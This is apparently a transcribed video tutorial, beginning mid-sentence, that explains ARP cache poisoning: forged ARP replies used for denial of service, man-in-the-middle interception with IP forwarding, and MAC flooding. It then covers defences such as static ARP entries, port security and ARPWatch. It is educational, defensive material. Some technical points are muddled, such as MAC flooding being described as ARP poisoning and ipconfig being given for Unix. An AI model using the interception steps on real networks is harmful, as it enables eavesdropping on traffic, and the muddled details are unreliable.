who has the IP address 192.168.0.45 as seen in this diagram, and all the devices on the network ignore this ARP request except for the HP LaserJet printer. The printer recognizes its own IP in the request and sends an ARP reply. Hey, this is my IP address and here is my MAC address, as you can see in this diagram. So now Jessica's computer knows the printer's MAC address. It sends the print job to the connect device, and it also associates the printer's MAC address of 00 whatever it may be with the printer's IP address of 192.168.0.45 in its ARP table. So the founders of networking actually probably simplified the communication process for ARP so that it would function efficiently, but unfortunately this simplicity also leads to major insecurity. Know why my short description of ARP doesn't mention any sort of authentication method? Because in ARP there is none, and it is quite a very much more insecure method of communicating between computers when there are no secure connections. ARP is very trusting, as you can say the specific term would be gullible, and when a network device sends an ARP request, it simply trusts that when the ARP comes in, it really does come from the correct device. ARP provides no way to verify that the responding device is really who it says it is. So if I go ahead and spoof my MAC address over here, IP address and MAC address as well, so the first time it goes ahead and asks the method, then I'll straight away go ahead and tell I have this IP address and MAC address, and I'll send it back to them, and the computer will later think that I, the attacker, has this IP address and the MAC address. So this is how it works. In fact, many operating systems implement ARP so trustingly that the devices have not made an ARP request still accept ARP replies from other devices. So think like a malicious hack. You just learned that the ARP protocol has no way of verifying ARP replies. You have learned many devices accept ARP replies before even requesting them. And well, don't I craft a perfectly valid yet malicious ARP reply containing any arbitrary IP and MAC address I choose? I can do that. Since my victim's computer will blindly accept the ARP entry into its ARP table, I can force my victim's computer into thinking that any IP is related to any MAC address I want. That means it asks for any IP address, it will be my computer, no one else's. Better yet, I can broadcast my faked ARP reply to the victim's entire network and fool all of his computers. So that's how it can be done. So back to reality now, you probably understand why this common technique is called as ARP cache poisoning, or just ARP poisoning, either way. The attacker lies to a device on your network, corrupting or poisoning its understanding of where other devices are. The frighteningly simple procedure enables the hacker to cause a variety of networking woes described next that I will be teaching you. And all the ARPs are now belong to us. The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including denial of service, man in the middle, and MAC flooding. And just before you ask me what these things are, I will be teaching you that in later part of the tutorial. And denial of service attack, a hacker can easily associate an operationally significant IP address to a false MAC address. For instance, let's say for example, a hacker can send an ARP reply associating your network router's IP address with a MAC address that doesn't exist. Your computers believe that they know where your real default gateway is, but in reality they are sending any packet whose destination is not on the local segment into the great bit bucket into the sky, and in one move the hacker has cut off your network from the internet, and he's only the person handling the computer. After that we have man-in-the-middle attack, and as I told you, a hacker can exploit ARP cache poisoning to intercept network traffics between two devices in your network. For instance, let's say the hacker wants to see all the traffic between your computer, that's 192.168.0.12, and your internet router, that's 192.168.0.1. The hacker begins by sending a malicious ARP reply for which there was no previous request to your router, associating with his computer's MAC address with 192.168.0.12. Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer associating his MAC address with your 192.168.0.1. Now your machine thinks the hacker's computer is your router. Finally, the hacker turns on an operating system feature called as IP forwarding. This enables the hacker's machine to forward any network traffic it receives from your computer to the router. So when you try to go to the internet, your computer sends the network traffic to the hacker's machine, which it then forwards to the real router. Since the hacker is still forwarding your traffic to the internet router, you remain unaware that he is intercepting all your network traffic and perhaps also sniffing your clear text passwords or hijacking your secure internet sessions as well. And then we have another attack, which is MAC flooding. MAC flooding is an ARP cache poisoning technique aimed at network switches. If you need a reminder about the difference between a hub and a switch, then when certain switches are, you can go and check over the internet and you will get a lot of information. When certain switches are overloaded, they often drop into a hub mode, and in hub mode, the switch is too busy to enforce its port security features, and it just broadcasts all network traffic to every computer in our network. And by flooding a switch's ARP table with a ton of spoofed ARP replies, a hacker can overload many vendor switches and then packet sniff your network while the switch is in the hub. So you might be a bit more scared right now that if the hackers can do all of these things, then what can you do? But just calm down. This is the scary stuff. ARP cache poisoning is trivial to exploit, yet that it can result in very significant network compromise. However, before you jump to looking at any other videos such as DEFCON 7, you may notice that the major mitigating factor, only local attackers can exploit ARP's insecurities. A hacker would need either physical access to your network or control of a machine on your local network in order to deliver an ARP cache poisoning attack. ARP's insecurities cannot be exploited remotely. He needs to be physically present there. That said, hackers have known to be good to gain local access to networks. Good network administrators should be aware of the ARP cache poisoning techniques as well. Since ARP cache poisoning results from lack of security in a protocol that is required for TCP/IP networking to function, you cannot fix it, but you can help prevent ARP attacks using some of the techniques such as keep your network small. If you manage a small network, you might try using static IP addresses and static ARP tables, or using command line CLI commands such as ipconfig/all in Windows or ipconfig in Unix, or you can learn the IP address and MAC address of every device in your network. Then using the ARP -s command, you can add static ARP entries for all your known devices. Static means unchanging, that cannot be changed, and dynamic IP address means something that can be changed. This prevents the hackers from adding spoofed ARP entries for devices in your network. You can even create a login script that would add these boot static changes to your PC every time they boot. However, static ARP entries are hard to maintain, impossible in large networks. That's because every device you add to your network has to be manually added to your ARP script or entered into each machine's ARP table. But if you manage fewer than 24 devices, this technique might work for you. And if you have large network, if you manage a large network, research your networks with port security features. One port security feature lets you force your switches to allow only one MAC address for each physical port on the switch. This prevents hackers from changing the MAC address of their machine or from trying to map more than one MAC address to their machine. It can often help prevent ARP based man in the middle or monkey in the middle attacks as well. And if you have other types of network, that means for all networks, your best defense is understanding ARP poisoning and monitoring for it. And I'll highly recommend deploying an ARP monitoring tool such as ARP Watch to alert you when an unusual ARP communication occurs. This kind of vigilance is still the greatest weapon against all kind of attacks. And the best line that I have heard on this specific hack from Robert Louis Stevenson is that the cruelest lies are often told in silence. And that's how ARP poisoning is exactly. So yes, that's how it works. So that would be it for this tutorial. And since you know how ARP poisoning works, in the next tutorial I will be teaching you about the DNS poisoning and how it works exactly, and what is the actual difference between DNS poisoning and DNS poisoning versus DNS spoofing. So that's it for this tutorial. Have a nice day ahead.